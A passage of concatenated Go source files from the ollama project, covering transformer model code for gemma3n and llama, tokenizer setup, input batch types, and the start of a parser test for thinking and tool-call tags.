	MLPNorm       *nn.RMSNorm `gguf:"ffn_norm"`
	MLP           *MLP
}

// Forward runs one transformer block over hiddenState.
func (l *Layer) Forward(ctx ml.Context, hiddenState, positionIDs, positionsScale, outputs ml.Tensor, cache kvcache.Cache, opts *TextOptions) ml.Tensor {
	residual := hiddenState
	hiddenState = l.AttentionNorm.Forward(ctx, hiddenState, opts.eps)
	hiddenState = l.SelfAttention.Forward(ctx, hiddenState, positionIDs, positionsScale, cache, opts)

	// In the final layer (outputs != nil), optimize by pruning to just the token positions
	// we need logits for.
	if outputs != nil {
		hiddenState = hiddenState.Rows(ctx, outputs)
		residual = residual.Rows(ctx, outputs)
	}

	hiddenState = hiddenState.Add(ctx, residual)
	residual = hiddenState
	hiddenState = l.MLPNorm.Forward(ctx, hiddenState, opts.eps)
	hiddenState = l.MLP.Forward(ctx, hiddenState, opts)
	return hiddenState.Add(ctx, residual)
}

// Forward runs the full text transformer: embed tokens, splice in any image
// embeddings from the batch, run all layers, and project to logits.
func (m *TextModel) Forward(ctx ml.Context, inputs, positions, positionsScale, outputs ml.Tensor, batch input.Batch, cache kvcache.Cache) ml.Tensor {
	// Duplicate so image features can be copied into the embedding tensor
	// without aliasing the shared embedding output.
	hiddenState := m.TokenEmbedding.Forward(ctx, inputs).Duplicate(ctx)

	// image embeddings
	for _, image := range batch.Multimodal {
		imageFeature := image.Multimodal[0].Tensor
		// Overwrite the placeholder [IMG] token embeddings at image.Index.
		ctx.Forward(imageFeature.Copy(ctx, hiddenState.View(ctx, image.Index*hiddenState.Stride(1), imageFeature.Dim(0)*imageFeature.Dim(1))))
	}

	for i, layer := range m.Layers {
		cache.SetLayer(i)
		var lastLayerOutputs ml.Tensor
		if i == len(m.Layers)-1 {
			// Only the last layer prunes to the requested output positions.
			lastLayerOutputs = outputs
		}
		hiddenState = layer.Forward(ctx, hiddenState, positions, positionsScale, lastLayerOutputs, cache, m.TextOptions)
	}

	hiddenState = m.OutputNorm.Forward(ctx, hiddenState, m.eps)
	return m.Output.Forward(ctx, hiddenState)
}

// getScale computes the per-position query scale tensor
// 1 + beta*ln(1 + floor(pos/origCtx)) used for long-context attention.
// NOTE(review): when ropeOrigPosEmbeddings is 0 the division yields +Inf and
// the result is unused by SelfAttention.Forward (guarded there); confirm
// callers never consume it in that case.
func (m *TextModel) getScale(ctx ml.Context, positions []int32) ml.Tensor {
	posScale := make([]float32, len(positions))
	for n, pos := range positions {
		interval := math.Floor(float64(pos) / float64(m.ropeOrigPosEmbeddings))
		posScale[n] = float32(1.0 + float64(m.ropeScalingBeta)*math.Log(1.0+interval))
	}
	return ctx.Input().FromFloats(posScale, 1, 1, len(posScale))
}

// newTextModel builds the text transformer from config.
func newTextModel(c fs.Config) *TextModel {
	return &TextModel{
		Layers: make([]Layer, c.Uint("block_count")),
		TextOptions: &TextOptions{
			hiddenSize:            int(c.Uint("embedding_length")),
			numHeads:              int(c.Uint("attention.head_count")),
			numKVHeads:            int(c.Uint("attention.head_count_kv")),
			headDim:               int(c.Uint("attention.key_length")),
			ropeDim:               int(c.Uint("rope.dimension_count")),
			eps:                   c.Float("attention.layer_norm_rms_epsilon"),
			ropeBase:              c.Float("rope.freq_base"),
			ropeScale:             c.Float("rope.scaling.factor", 1.0),
			ropeOrigPosEmbeddings: int(c.Uint("rope.scaling.original_context_length")),
			ropeScalingBeta:       c.Float("rope.scaling_beta", 0.1),
			ropeBetaFast:          c.Float("rope.scaling.beta_fast", 32.0),
			ropeBetaSlow:          c.Float("rope.scaling.beta_slow", 1.0),
			ropeType:              c.String("rope.scaling.type"),
			ropeMscale:            c.Float("rope.scaling.mscale"),
			ropeMscaleAllDim:      c.Float("rope.scaling.mscale_all_dim"),
			ropeExtrapolation:     c.Float("rope.scaling.extrapolation_factor", 1),
		},
	}
}
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/gemma3n/model.go
model/models/gemma3n/model.go
package gemma3n import ( "github.com/ollama/ollama/fs" "github.com/ollama/ollama/kvcache" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/model" "github.com/ollama/ollama/model/input" ) type Model struct { model.Base model.SentencePiece *TextModel } // Forward implements model.Model. func (m *Model) Forward(ctx ml.Context, batch input.Batch) (ml.Tensor, error) { return m.TextModel.Forward(ctx, batch, m.Cache) } func New(c fs.Config) (model.Model, error) { m := Model{ TextModel: newTextModel(c), SentencePiece: model.NewSentencePiece( &model.Vocabulary{ Values: c.Strings("tokenizer.ggml.tokens"), Scores: c.Floats("tokenizer.ggml.scores"), Types: c.Ints("tokenizer.ggml.token_type"), AddBOS: c.Bool("tokenizer.ggml.add_bos_token", true), BOS: []int32{int32(c.Uint("tokenizer.ggml.bos_token_id"))}, AddEOS: c.Bool("tokenizer.ggml.add_eos_token", false), EOS: append( []int32{int32(c.Uint("tokenizer.ggml.eos_token_id"))}, c.Ints("tokenizer.ggml.eos_token_ids")..., ), }, ), } m.Cache = kvcache.NewWrapperCache( kvcache.NewCausalCache(m.Shift), kvcache.NewSWACache(int32(c.Uint("attention.sliding_window")), m.Shift), ) return &m, nil } func init() { model.Register("gemma3n", New) }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/gemma3n/model_text.go
model/models/gemma3n/model_text.go
package gemma3n import ( "cmp" "math" "github.com/ollama/ollama/fs" "github.com/ollama/ollama/kvcache" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/ml/nn" "github.com/ollama/ollama/ml/nn/rope" "github.com/ollama/ollama/model/input" ) type TextModel struct { TokenEmbedding *TextScaledWordEmbedding `gguf:"token_embd"` *PerLayerProjector AltupEmbd *nn.Linear `gguf:"altup_proj"` AltupUnembd *nn.Linear `gguf:"altup_unembd_proj"` TextLayers []TextLayer `gguf:"blk"` OutputNorm *nn.RMSNorm `gguf:"output_norm"` Output *nn.Linear `gguf:"output,alt:token_embd"` TextOptions } func (m *TextModel) Forward(ctx ml.Context, batch input.Batch, cache kvcache.Cache) (ml.Tensor, error) { positions := ctx.Input().FromInts(batch.Positions, len(batch.Positions)) // Create a tensor of a single float32 value of 1.0 to use for altup correction one := ctx.Input().FromFloats([]float32{1.0}, 1) inputs := m.TokenEmbedding.Forward(ctx, batch.Inputs, math.Sqrt(float64(m.hiddenSize))) inputsPerLayer := m.PerLayerProjector.Forward(ctx, batch, inputs, &m.TextOptions) targetMagnitude := inputs.Sqr(ctx).Mean(ctx).Sqrt(ctx) targetMagnitude = targetMagnitude.Repeat(ctx, 2, m.altupInputs-1) hiddenState := inputs.Repeat(ctx, 2, m.altupInputs-1) altupProj := m.AltupEmbd.Forward(ctx, hiddenState) altupProj = altupProj.Mul(ctx, targetMagnitude.Div(ctx, altupProj.Sqr(ctx).Mean(ctx).Sqrt(ctx))) hiddenStates := inputs.Concat(ctx, altupProj, 2) firstSharedKeyValue := m.hiddenLayers - m.sharedKeyValueLayers for i, layer := range m.TextLayers { if i < firstSharedKeyValue { cache.SetLayer(i) } else if m.isLocal(i) { cache.SetLayer(firstSharedKeyValue - 2) } else { cache.SetLayer(firstSharedKeyValue - 1) } var layerType int ropeBase := m.ropeBase if m.isLocal(i) { layerType = 1 ropeBase = m.ropeBaseLocal } cache.(*kvcache.WrapperCache).SetLayerType(layerType) // inputPerLayer = inputsPerLayer[:, i, :].squeeze(1) inputPerLayer := inputsPerLayer.View(ctx, i*inputsPerLayer.Stride(1), inputsPerLayer.Dim(0), 
inputsPerLayer.Stride(2), inputsPerLayer.Dim(2)) hiddenStates = layer.Forward(ctx, hiddenStates, inputPerLayer, positions, one, cache, i >= firstSharedKeyValue, ropeBase, float64(m.activationSparsityScale[i]), &m.TextOptions) } // hiddenStates = hiddenStates[:, :, 0] hiddenStates0 := hiddenStates.Slice(ctx, 2, 0, 1, 1) targetMagnitude = hiddenStates0.Sqr(ctx).Mean(ctx).Sqrt(ctx) targetMagnitude = targetMagnitude.Repeat(ctx, 2, m.altupInputs-1) // hiddenState = hiddenStates[:, :, 1:] hiddenState = hiddenStates.Slice(ctx, 2, 1, hiddenStates.Dim(2), 1) altupUnembdProj := m.AltupUnembd.Forward(ctx, hiddenState) altupUnembdProj = altupUnembdProj.Mul(ctx, targetMagnitude.Div(ctx, altupUnembdProj.Sqr(ctx).Mean(ctx).Sqrt(ctx))) hiddenStates = hiddenStates0.Concat(ctx, altupUnembdProj, 2) hiddenStates = hiddenStates.Permute(ctx, 1, 2, 0, 3).Contiguous(ctx).Mean(ctx) hiddenStates = hiddenStates.Permute(ctx, 2, 0, 1, 3).Contiguous(ctx) hiddenStates = hiddenStates.Rows(ctx, batch.Outputs) hiddenStates = m.OutputNorm.Forward(ctx, hiddenStates, m.eps) return m.Output.Forward(ctx, hiddenStates), nil } func (m *TextModel) Shift(ctx ml.Context, layer int, key, shift ml.Tensor) (ml.Tensor, error) { ropeBase := m.ropeBase if m.isLocal(layer) { ropeBase = m.ropeBaseLocal } return m.applyRotaryPositionEmbeddings(ctx, key, shift, ropeBase), nil } type TextScaledWordEmbedding struct { *nn.Embedding } func (e TextScaledWordEmbedding) Forward(ctx ml.Context, inputIDs ml.Tensor, scale float64) ml.Tensor { return e.Embedding.Forward(ctx, inputIDs).Scale(ctx, scale) } type PerLayerProjector struct { TokenEmbedding *TextScaledWordEmbedding `gguf:"per_layer_token_embd"` Projector *nn.Linear `gguf:"per_layer_model_proj"` Norm *nn.RMSNorm `gguf:"per_layer_proj_norm"` } func (p PerLayerProjector) Forward(ctx ml.Context, batch input.Batch, inputs ml.Tensor, opts *TextOptions) ml.Tensor { inputsPerLayer := p.TokenEmbedding.Forward(ctx, batch.Inputs, math.Sqrt(float64(opts.hiddenSizePerLayerInput))) 
inputsPerLayer = inputsPerLayer.Reshape(ctx, opts.hiddenSizePerLayerInput, opts.hiddenLayers, batch.Inputs.Dim(0), batch.Inputs.Dim(1)) perLayerProjection := p.Projector.Forward(ctx, inputs) perLayerProjection = perLayerProjection.Scale(ctx, math.Sqrt(float64(opts.hiddenSize))) perLayerProjection = perLayerProjection.Reshape(ctx, opts.hiddenSizePerLayerInput, opts.hiddenLayers, inputs.Dim(1)) perLayerProjection = p.Norm.Forward(ctx, perLayerProjection, opts.eps) if inputsPerLayer != nil { perLayerProjection = perLayerProjection.Add(ctx, inputsPerLayer) perLayerProjection = perLayerProjection.Scale(ctx, 1/math.Sqrt(2)) } return perLayerProjection } type TextLayer struct { *AltUp *Laurel AttentionNorm *nn.RMSNorm `gguf:"attn_norm"` Attention *TextAttention PostAttentionNorm *nn.RMSNorm `gguf:"post_attention_norm"` MLPNorm *nn.RMSNorm `gguf:"ffn_norm"` MLP *TextMLP PostMLPNorm *nn.RMSNorm `gguf:"post_ffw_norm"` PerLayerInputGate *nn.Linear `gguf:"inp_gate"` PerLayerProjection *nn.Linear `gguf:"proj"` PostPerLayerNorm *nn.RMSNorm `gguf:"post_norm"` } func (d TextLayer) Forward(ctx ml.Context, hiddenStates, perLayerInput, positions, one ml.Tensor, cache kvcache.Cache, sharedKV bool, ropeBase float32, activationSparsityScale float64, opts *TextOptions) ml.Tensor { predictions := d.Predict(ctx, hiddenStates, opts) active := opts.altupActive(ctx, predictions) attn := d.AttentionNorm.Forward(ctx, active, opts.eps) laurel := d.Laurel.Forward(ctx, attn, opts) attn = d.Attention.Forward(ctx, attn, positions, cache, sharedKV, ropeBase, opts) attn = d.PostAttentionNorm.Forward(ctx, attn, opts.eps) attn = active.Add(ctx, attn) attn = attn.Add(ctx, laurel).Scale(ctx, 1/math.Sqrt(2)) mlp := d.MLPNorm.Forward(ctx, attn, opts.eps) mlp = d.MLP.Forward(ctx, mlp, activationSparsityScale) mlp = d.PostMLPNorm.Forward(ctx, mlp, opts.eps) mlp = attn.Add(ctx, mlp) predictions = d.Correct(ctx, predictions, mlp, one, opts) active = opts.altupActive(ctx, predictions) if opts.altupCorrectScale { 
active = d.ScaleCorrectedOutput(ctx, active) } active = d.PerLayerInputGate.Forward(ctx, active) active = active.GELU(ctx, perLayerInput) active = d.PerLayerProjection.Forward(ctx, active) active = d.PostPerLayerNorm.Forward(ctx, active, opts.eps) // inactive := predictions[:, :, 1:] inactive := predictions.Slice(ctx, 2, 1, predictions.Dim(2), 1) active = inactive.Add(ctx, active) predictions0 := predictions.Slice(ctx, 2, 0, 1, 1) return predictions0.Concat(ctx, active, 2) } type AltUp struct { CorrectionScale ml.Tensor `gguf:"altup_correct_scale.weight"` PredictionCoefficient *nn.Linear `gguf:"altup_predict_coef"` CorrectionCoefficient *nn.Linear `gguf:"altup_correct_coef"` Router *nn.Linear `gguf:"altup_router"` RouterNorm *nn.RMSNorm `gguf:"altup_router_norm"` } func (a AltUp) computeRouterModalities(ctx ml.Context, hiddenStates ml.Tensor, opts *TextOptions) ml.Tensor { routerInputs := a.RouterNorm.Forward(ctx, hiddenStates, opts.eps).Scale(ctx, 1.0/float64(opts.hiddenSize)) return a.Router.Forward(ctx, routerInputs).Tanh(ctx) } func (a AltUp) Predict(ctx ml.Context, hiddenStates ml.Tensor, opts *TextOptions) ml.Tensor { modalities := a.computeRouterModalities(ctx, opts.altupActive(ctx, hiddenStates), opts) coefficients := a.PredictionCoefficient.Forward(ctx, modalities) coefficients = coefficients.Reshape(ctx, opts.altupInputs, opts.altupInputs, coefficients.Dim(1), coefficients.Dim(2)) predictions := coefficients.Mulmat(ctx, hiddenStates.Permute(ctx, 1, 2, 0, 3).Contiguous(ctx)) predictions = predictions.Permute(ctx, 2, 0, 1, 3).Contiguous(ctx) return predictions.Add(ctx, hiddenStates) } func (a AltUp) Correct(ctx ml.Context, predictions, activated, one ml.Tensor, opts *TextOptions) ml.Tensor { innovation := activated.Sub(ctx, opts.altupActive(ctx, predictions)) innovation = innovation.Repeat(ctx, 2, opts.altupInputs) modalities := a.computeRouterModalities(ctx, activated, opts) coefficients := a.CorrectionCoefficient.Forward(ctx, modalities) coefficients = 
coefficients.Add(ctx, one) coefficients = coefficients.Reshape(ctx, 1, coefficients.Dim(0), coefficients.Dim(1)) coefficients = coefficients.Permute(ctx, 0, 2, 1, 3).Contiguous(ctx) corrected := innovation.Mul(ctx, coefficients) corrected = corrected.Add(ctx, predictions) return corrected } func (a AltUp) ScaleCorrectedOutput(ctx ml.Context, predictions ml.Tensor) ml.Tensor { return predictions.Mul(ctx, a.CorrectionScale) } type Laurel struct { LinearLeft *nn.Linear `gguf:"laurel_l"` LinearRight *nn.Linear `gguf:"laurel_r"` PostLaurelNorm *nn.RMSNorm `gguf:"laurel_post_norm"` } func (l Laurel) Forward(ctx ml.Context, hiddenStates ml.Tensor, opts *TextOptions) ml.Tensor { residual := hiddenStates hiddenStates = l.LinearLeft.Forward(ctx, hiddenStates) hiddenStates = l.LinearRight.Forward(ctx, hiddenStates) hiddenStates = l.PostLaurelNorm.Forward(ctx, hiddenStates, opts.eps) return hiddenStates.Add(ctx, residual) } type TextAttention struct { Query *nn.Linear `gguf:"attn_q"` QueryNorm *nn.RMSNorm `gguf:"attn_q_norm"` Key *nn.Linear `gguf:"attn_k"` KeyNorm *nn.RMSNorm `gguf:"attn_k_norm"` Value *nn.Linear `gguf:"attn_v"` Output *nn.Linear `gguf:"attn_output"` } func (attn TextAttention) Forward(ctx ml.Context, hiddenStates, positions ml.Tensor, cache kvcache.Cache, sharedKV bool, ropeBase float32, opts *TextOptions) ml.Tensor { batchSize := hiddenStates.Dim(1) query := attn.Query.Forward(ctx, hiddenStates) query = query.Reshape(ctx, opts.headDim(), opts.numHeads, batchSize) query = attn.QueryNorm.Forward(ctx, query, opts.eps) query = opts.applyRotaryPositionEmbeddings(ctx, query, positions, ropeBase) var key, value ml.Tensor if !sharedKV { key = attn.Key.Forward(ctx, hiddenStates) key = key.Reshape(ctx, opts.headDim(), opts.numKVHeads, batchSize) key = attn.KeyNorm.Forward(ctx, key, opts.eps) key = opts.applyRotaryPositionEmbeddings(ctx, key, positions, ropeBase) value = attn.Value.Forward(ctx, hiddenStates) value = value.Reshape(ctx, opts.headDim(), opts.numKVHeads, 
batchSize) value = value.RMSNorm(ctx, nil, opts.eps) } attention := nn.Attention(ctx, query, key, value, 1., cache) attention = attention.Reshape(ctx, attention.Dim(0)*attention.Dim(1), batchSize) return attn.Output.Forward(ctx, attention) } type TextMLP struct { Gate *nn.Linear `gguf:"ffn_gate"` Up *nn.Linear `gguf:"ffn_up"` Down *nn.Linear `gguf:"ffn_down"` } func (mlp TextMLP) Forward(ctx ml.Context, hiddenStates ml.Tensor, activationSparsityScale float64) ml.Tensor { upStates := mlp.Up.Forward(ctx, hiddenStates) hiddenStates = mlp.Gate.Forward(ctx, hiddenStates) if activationSparsityScale > 0 { mean := hiddenStates.Mean(ctx) std := hiddenStates.Stddev(ctx).Scale(ctx, activationSparsityScale) cutoff := mean.Add(ctx, std) hiddenStates = hiddenStates.Sub(ctx, cutoff).RELU(ctx) } hiddenStates = hiddenStates.GELU(ctx, upStates) hiddenStates = mlp.Down.Forward(ctx, hiddenStates) return hiddenStates } type TextOptions struct { hiddenLayers int hiddenSize int hiddenSizePerLayerInput int numHeads, numKVHeads int keyLength, valueLength int sharedKeyValueLayers int altupActiveIndex int altupInputs int altupCorrectScale bool eps float32 ropeBase float32 ropeBaseLocal float32 ropeScale float32 slidingWindowPattern []bool activationSparsityScale []float32 } func (o *TextOptions) altupActive(ctx ml.Context, t ml.Tensor) ml.Tensor { // t[:, :, o.altupActiveIndex] return t.Slice(ctx, 2, o.altupActiveIndex, o.altupActiveIndex+1, 1) } func (o *TextOptions) headDim() int { return cmp.Or(o.keyLength, o.valueLength, o.hiddenSize/o.numHeads) } func (o *TextOptions) isLocal(i int) bool { return o.slidingWindowPattern[i] } func (o TextOptions) applyRotaryPositionEmbeddings(ctx ml.Context, t, p ml.Tensor, base float32) ml.Tensor { return nn.RoPE(ctx, t, p, o.headDim(), base, 1./o.ropeScale, rope.WithTypeNeoX()) } func newTextModel(c fs.Config) *TextModel { return &TextModel{ TextLayers: make([]TextLayer, c.Uint("block_count")), TextOptions: TextOptions{ hiddenLayers: 
int(c.Uint("block_count")), hiddenSize: int(c.Uint("embedding_length")), hiddenSizePerLayerInput: int(c.Uint("embedding_length_per_layer_input")), numHeads: int(c.Uint("attention.head_count")), numKVHeads: int(c.Uint("attention.head_count_kv")), keyLength: int(c.Uint("attention.key_length")), valueLength: int(c.Uint("attention.value_length")), sharedKeyValueLayers: int(c.Uint("attention.shared_kv_layers")), altupActiveIndex: int(c.Uint("altup.active_idx")), altupInputs: int(c.Uint("altup.num_inputs")), eps: c.Float("attention.layer_norm_rms_epsilon", 1e-06), ropeBase: c.Float("rope.freq_base", 1_000_000), ropeBaseLocal: c.Float("rope.freq_base_local", 10_000), ropeScale: c.Float("rope.scaling.factor", 1.0), slidingWindowPattern: c.Bools("attention.sliding_window_pattern"), activationSparsityScale: c.Floats("activation_sparsity_scale"), }, } }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/llama/model.go
model/models/llama/model.go
package llama import ( "cmp" "math" "github.com/ollama/ollama/fs" "github.com/ollama/ollama/kvcache" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/ml/nn" "github.com/ollama/ollama/ml/nn/rope" "github.com/ollama/ollama/model" "github.com/ollama/ollama/model/input" ) type Options struct { hiddenSize, numHeads, numKVHeads int headDim, ropeDim int eps, ropeBase, ropeScale float32 } func (o Options) applyRotaryPositionEmbeddings(ctx ml.Context, states, positions, factors ml.Tensor) ml.Tensor { return nn.RoPE(ctx, states, positions, cmp.Or(o.ropeDim, o.headDim, o.hiddenSize/o.numHeads), o.ropeBase, 1./o.ropeScale, rope.WithFactors(factors)) } type Model struct { model.Base model.TextProcessor TokenEmbedding *nn.Embedding `gguf:"token_embd"` Layers []Layer `gguf:"blk"` OutputNorm *nn.RMSNorm `gguf:"output_norm"` Output *nn.Linear `gguf:"output,alt:token_embd"` Options } func New(c fs.Config) (model.Model, error) { if c.Uint("expert_count") > 0 { // TODO: support mixtures of experts return nil, model.ErrUnsupportedModel } var processor model.TextProcessor vocabulary := model.Vocabulary{ Values: c.Strings("tokenizer.ggml.tokens"), Scores: c.Floats("tokenizer.ggml.scores"), Types: c.Ints("tokenizer.ggml.token_type"), Merges: c.Strings("tokenizer.ggml.merges"), AddBOS: c.Bool("tokenizer.ggml.add_bos_token", true), BOS: []int32{int32(c.Uint("tokenizer.ggml.bos_token_id"))}, AddEOS: c.Bool("tokenizer.ggml.add_eos_token", false), EOS: append( []int32{int32(c.Uint("tokenizer.ggml.eos_token_id"))}, c.Ints("tokenizer.ggml.eos_token_ids")..., ), } switch c.String("tokenizer.ggml.model") { case "gpt2": var pretokenizers []string switch c.String("tokenizer.ggml.pre") { case "default": // no-op use the default bpe pretokenizer case "qwen2": pretokenizers = []string{ "(?i:'s|'t|'re|'ve|'m|'ll|'d)|[^\\r\\n\\p{L}\\p{N}]?\\p{L}+|\\p{N}| ?[^\\s\\p{L}\\p{N}]+[\\r\\n]*|\\s*[\\r\\n]+|\\s+(?!\\S)|\\s+", } case "refact": pretokenizers = []string{ `\p{N}`, `'s|'t|'re|'ve|'m|'ll|'d| 
?\p{L}+| ?\p{N}+| ?[^\s\p{L}\p{N}]+|\s+(?!\S)|\s+`, } case "tekken": pretokenizers = []string{ "[^\\r\\n\\p{L}\\p{N}]?[\\p{Lu}\\p{Lt}\\p{Lm}\\p{Lo}\\p{M}]*[\\p{Ll}\\p{Lm}\\p{Lo}\\p{M}]+|[^\\r\\n\\p{L}\\p{N}]?[\\p{Lu}\\p{Lt}\\p{Lm}\\p{Lo}\\p{M}]+[\\p{Ll}\\p{Lm}\\p{Lo}\\p{M}]*|\\p{N}| ?[^\\s\\p{L}\\p{N}]+[\\r\\n/]*|\\s*[\\r\\n]+|\\s+(?!\\S)|\\s+", } default: // use a llama-style pretokenizer pretokenizers = []string{ "(?i:'s|'t|'re|'ve|'m|'ll|'d)|[^\\r\\n\\p{L}\\p{N}]?\\p{L}+|\\p{N}{1,3}| ?[^\\s\\p{L}\\p{N}]+[\\r\\n]*|\\s*[\\r\\n]+|\\s+(?!\\S)|\\s+", } } processor = model.NewBytePairEncoding(&vocabulary, pretokenizers...) case "llama": processor = model.NewSentencePiece(&vocabulary) default: return nil, model.ErrUnsupportedTokenizer } m := Model{ TextProcessor: processor, Layers: make([]Layer, c.Uint("block_count")), Options: Options{ hiddenSize: int(c.Uint("embedding_length")), numHeads: int(c.Uint("attention.head_count")), numKVHeads: int(c.Uint("attention.head_count_kv")), headDim: int(c.Uint("attention.key_length")), ropeDim: int(c.Uint("rope.dimension_count")), eps: c.Float("attention.layer_norm_rms_epsilon"), ropeBase: c.Float("rope.freq_base", 1e5), ropeScale: c.Float("rope.scaling.factor", 1), }, } m.Cache = kvcache.NewCausalCache(m.Shift) return &m, nil } type SelfAttention struct { Query *nn.Linear `gguf:"attn_q"` Key *nn.Linear `gguf:"attn_k"` Value *nn.Linear `gguf:"attn_v"` Output *nn.Linear `gguf:"attn_output"` RopeFactors ml.Tensor `gguf:"rope_freqs.weight"` } func (sa *SelfAttention) Forward(ctx ml.Context, hiddenState, positions ml.Tensor, cache kvcache.Cache, opts *Options) ml.Tensor { batchSize := hiddenState.Dim(1) headDim := cmp.Or(opts.headDim, opts.hiddenSize/opts.numHeads) query := sa.Query.Forward(ctx, hiddenState) query = query.Reshape(ctx, headDim, opts.numHeads, batchSize) key := sa.Key.Forward(ctx, hiddenState) key = key.Reshape(ctx, headDim, opts.numKVHeads, batchSize) value := sa.Value.Forward(ctx, hiddenState) value = 
value.Reshape(ctx, headDim, opts.numKVHeads, batchSize) query = opts.applyRotaryPositionEmbeddings(ctx, query, positions, sa.RopeFactors) key = opts.applyRotaryPositionEmbeddings(ctx, key, positions, sa.RopeFactors) attention := nn.Attention(ctx, query, key, value, 1.0/math.Sqrt(float64(headDim)), cache) attention = attention.Reshape(ctx, headDim*opts.numHeads, batchSize) return sa.Output.Forward(ctx, attention) } func (m *Model) Shift(ctx ml.Context, layer int, key, shift ml.Tensor) (ml.Tensor, error) { return m.applyRotaryPositionEmbeddings(ctx, key, shift, m.Layers[layer].SelfAttention.RopeFactors), nil } type MLP struct { Up *nn.Linear `gguf:"ffn_up"` Down *nn.Linear `gguf:"ffn_down"` Gate *nn.Linear `gguf:"ffn_gate"` } func (mlp *MLP) Forward(ctx ml.Context, hiddenState ml.Tensor, opts *Options) ml.Tensor { hiddenState = mlp.Gate.Forward(ctx, hiddenState).SILU(ctx, mlp.Up.Forward(ctx, hiddenState)) return mlp.Down.Forward(ctx, hiddenState) } type Layer struct { AttentionNorm *nn.RMSNorm `gguf:"attn_norm"` SelfAttention *SelfAttention MLPNorm *nn.RMSNorm `gguf:"ffn_norm"` MLP *MLP } func (l *Layer) Forward(ctx ml.Context, hiddenState, positions, outputs ml.Tensor, cache kvcache.Cache, opts *Options) ml.Tensor { residual := hiddenState hiddenState = l.AttentionNorm.Forward(ctx, hiddenState, opts.eps) hiddenState = l.SelfAttention.Forward(ctx, hiddenState, positions, cache, opts) // In the final layer (outputs != nil), optimize by pruning to just the token positions // we need logits for. 
if outputs != nil { hiddenState = hiddenState.Rows(ctx, outputs) residual = residual.Rows(ctx, outputs) } hiddenState = hiddenState.Add(ctx, residual) residual = hiddenState hiddenState = l.MLPNorm.Forward(ctx, hiddenState, opts.eps) hiddenState = l.MLP.Forward(ctx, hiddenState, opts) return hiddenState.Add(ctx, residual) } func (m *Model) Forward(ctx ml.Context, batch input.Batch) (ml.Tensor, error) { positions := ctx.Input().FromInts(batch.Positions, len(batch.Positions)) hiddenState := m.TokenEmbedding.Forward(ctx, batch.Inputs) for i, layer := range m.Layers { m.Cache.SetLayer(i) var outputs ml.Tensor if i == len(m.Layers)-1 { outputs = batch.Outputs } hiddenState = layer.Forward(ctx, hiddenState, positions, outputs, m.Cache, &m.Options) } hiddenState = m.OutputNorm.Forward(ctx, hiddenState, m.eps) return m.Output.Forward(ctx, hiddenState), nil } func init() { model.Register("llama", New) }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/input/input.go
model/input/input.go
package input import "github.com/ollama/ollama/ml" // Multimodal is a multimodal embedding or a component of one. // For example, it could be a row of an image that can be processed // independently. type Multimodal struct { // Tensor is the embedding data. Implementations may chose what to // store here or it may be nil if not needed. However, any ml.Tensor // objects must be stored here and not in Data. Tensor ml.Tensor // Data is implementation-specific opaque data, such as metadata on how // to layout Tensor. It may be nil if not needed. It may also store larger // objects such as complete images if they are to be processed later. Data any } // Input represents one token in the input stream type Input struct { // Token is a single element of text. Token int32 // Multimodal is represents a non-text element such as an // image (or part of one if the image can be processed in pieces). // It may be used either together with Token or on its own. Multimodal []Multimodal // MultimodalHash is a unique representation of the data // stored in Multimodal, used for caching and comparing // equality. MultimodalHash uint64 // SameBatch forces the following number of tokens to be processed // in a single batch, breaking and extending batches as needed. // Useful for things like images that must be processed in one // shot. SameBatch int } // MultimodalIndex is a multimodal element (such as an image) // together with an index into the slice of Inputs with the // corresponding token. Note that the index is not the same // as the position - to find that use the index with the // Positions slice. type MultimodalIndex struct { Index int Multimodal []Multimodal } // Batch contains the inputs for a model forward pass type Batch struct { // Inputs is the input tokens, including placeholders for multimodal inputs. Inputs ml.Tensor // Outputs are the set of indicies into Inputs for which output data should // be returned. 
Outputs ml.Tensor // Positions is the position for each Input, relative to its sequence. Equal // in length to Inputs. Positions []int32 // Sequences is the sequence for each Input. Equal in length to Inputs. Sequences []int // Multimodal is a set of multimodal embeddings previously created by // EncodeMultimodal, along with an index into Inputs. Unused for text-only // models or for batches without multimodal elements. Multimodal []MultimodalIndex }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/parsers/qwen3vl_thinking_test.go
model/parsers/qwen3vl_thinking_test.go
package parsers import ( "reflect" "testing" "github.com/ollama/ollama/api" ) func TestQwen3VLThinkingParserStreaming(t *testing.T) { type step struct { input string wantEvents []qwenEvent } cases := []struct { desc string steps []step only bool }{ { desc: "simple thinking", steps: []step{ {input: "abc</think>", wantEvents: []qwenEvent{qwenEventThinkingContent{content: "abc"}}}, }, }, { desc: "simple trip thinking", steps: []step{ {input: "<think>abc</think>", wantEvents: []qwenEvent{qwenEventThinkingContent{content: "<think>abc"}}}, }, }, { desc: "thinking with split tags", steps: []step{ {input: "abc", wantEvents: []qwenEvent{qwenEventThinkingContent{content: "abc"}}}, {input: "</think>", wantEvents: []qwenEvent{}}, }, }, { desc: "multiple think tags", steps: []step{ {input: "abc<think>actually, is not thinking</think>", wantEvents: []qwenEvent{qwenEventThinkingContent{content: "abc<think>actually, is not thinking"}}}, }, }, { desc: "thinking and tool call", steps: []step{ { input: "I'm thinking</think><tool_call>I'm tool calling</tool_call>", wantEvents: []qwenEvent{ qwenEventThinkingContent{content: "I'm thinking"}, qwenEventRawToolCall{raw: "I'm tool calling"}, }, }, }, }, { desc: "thinking and content", steps: []step{ { input: "I'm thinking</think>I'm content", wantEvents: []qwenEvent{ qwenEventThinkingContent{content: "I'm thinking"}, qwenEventContent{content: 